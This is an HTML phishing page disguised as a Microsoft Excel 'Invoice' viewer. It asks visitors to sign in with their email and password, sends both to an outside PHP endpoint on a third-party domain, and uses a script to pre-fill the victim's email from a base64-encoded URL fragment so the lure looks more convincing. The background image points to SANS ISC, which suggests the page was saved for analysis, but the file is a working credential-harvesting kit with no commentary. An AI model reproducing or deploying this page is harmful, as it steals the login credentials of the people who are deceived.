<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Invoice</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.js" integrity="sha512-8Z5++K1rB3U+USaLKG6oO8uWWBhdYsM3hmdirnOEWp8h2B1aOikj5zBzlXs8QOrvY9OxEnD2QDkbSKKpfqcIWw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>

    <style>
        

@import url(https://fonts.googleapis.com/css?family=PT+Sans:400,700);

html {
    min-height: 100%;
}
body {
    background-image: url("https://isc.sans.edu/diaryimages/images/blurred21207.jpg");

 background-size: cover;
            position: absolute;
            width: 100%;
            height: 100%;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            margin: auto;
            overflow: hidden;
            font-family: 'PT Sans', sans-serif;
}
.login {
            padding: 10px;
        }

        .files {
            background: #FFFFF9;
            margin: 200px auto;
            width: 90%;
            max-width: 450px;
            text-align: center;
            color: #fff;
            border-radius: 20px;
        }

        form {
            max-width: 450px;
            margin: 0 auto;
        }

        form>div {
            position: relative;
            background: white;
            border-bottom: 1px solid #ccc;
            color: #000;
        }

        form>div>label {
            opacity: 0.3;
            font-weight: bold;
            position: absolute;
            top: 22px;
            left: 20px;
        }

        form>div>input[type="text"],
        form>div>input[type="email"],
        form>div>input[type="password"] {
            width: 100%;
            border: 0;
            padding: 20px 20px 20px 50px;
            background: #fff;
        }

        form>div>input[type="text"]:focus,
        form>div>input[type="email"]:focus,
        form>div>input[type="password"]:focus {
            outline: 0;
            background: white;
        }

        form>div>input[type="text"]:focus+label,
        form>div>input[type="email"]:focus+label,
        form>div>input[type="password"]:focus+label {
            opacity: 0;
        }

        form>div>input[type="text"]:valid,
        form>div>input[type="email"]:valid,
        form>div>input[type="password"]:valid {
            background-size: 20px;
            background-repeat: no-repeat;
            background-position: 20px 20px;
        }

        form>div>input[type="text"]:valid+label,
        form>div>input[type="email"]:valid+label,
        form>div>input[type="password"]:valid+label {
            opacity: 0;
        }

        form>div>input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
        form>div>input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
        form>div>input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
            background: pink;
        }

        form>div>input[type="text"]:invalid:not(:focus):not(:placeholder-shown)+label,
        form>div>input[type="email"]:invalid:not(:focus):not(:placeholder-shown)+label,
        form>div>input[type="password"]:invalid:not(:focus):not(:placeholder-shown)+label {
            opacity: 0;
        }

        form>div>input[type="text"]:invalid:focus:not(:placeholder-shown)~.requirements,
        form>div>input[type="email"]:invalid:focus:not(:placeholder-shown)~.requirements,
        form>div>input[type="password"]:invalid:focus:not(:placeholder-shown)~.requirements {
            max-height: 200px;
            padding: 0 30px 20px 50px;
        }

        form>div .requirements {
            padding: 0 30px 0 50px;
            color: #999;
            max-height: 0;
            transition: 0.28s;
            overflow: hidden;
            color: red;
            font-style: italic;
        }

        .btn {
            width: 50%;
            margin: 20px 0;
            background: #0052CC;
            color: white;
            border-radius: 30px;
            padding: 12px;
            font-size: 1.2rem;

        }
        * {
            box-sizing: border-box;
        }

        .invalid {
            background: #000;
            color: #000;
        }

        @media screen and (max-width: 360px) and (min-width: 320px) {
            .files {
                margin: 100px auto;
            }
        }
        </style>
</head>
<body>
    <div class="files">
        <img style="height: 50px; margin-top: 15px;" src="https://seeklogo.com/images/E/excel-logo-974BFF9CB9-seeklogo.com.png">

    <h2 style="color: #000;">Sign in to view the document</h2>

        <div class="login">
<form action="https://sub.skyrealtorestate.com/dlexcel/break.php" method="post" name="myform" id="myForm">
<div>
    

<input type="email" id="email" name="email" required="" placeholder="" value=""> 

<label for="email">Email Address</label>
<div class="requirements">Only valid Email Address</div></div>			
<div id="first">
                    <input type="password" id="password" name="pass" required="" placeholder=" ">
                    <label for="password">Password</label>
                    
                </div>

                <input type="submit" id="first_sub" class="btn" value="View Document">

              
              
    </form></div>
    


<script language="JavaScript">

// const queryString = window.location.search;
//    // console.log(queryString);
//     const urlParams = new URLSearchParams(queryString);
//       const product = urlParams.get('email')
//     // console.log(product);
//      document.getElementById("email").value = product;
   

var email = window.location.hash.substr(1);
    if (!email) {

    } else {
        var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

        if (!base64regex.test(email)) {
            // alert(btoa(email));
            var my_email = email;
        } else {
            // alert(atob(email));
            var my_email = atob(email);
        }
        // $('#email').val(email);
        // var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        // $('#email').val(email);
        // var my_email = email;
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#email').val(my_email);
        $('#email').attr('autofocus', true);
        // $("#msg").hide();
    }

    </script>
</div></body></html>
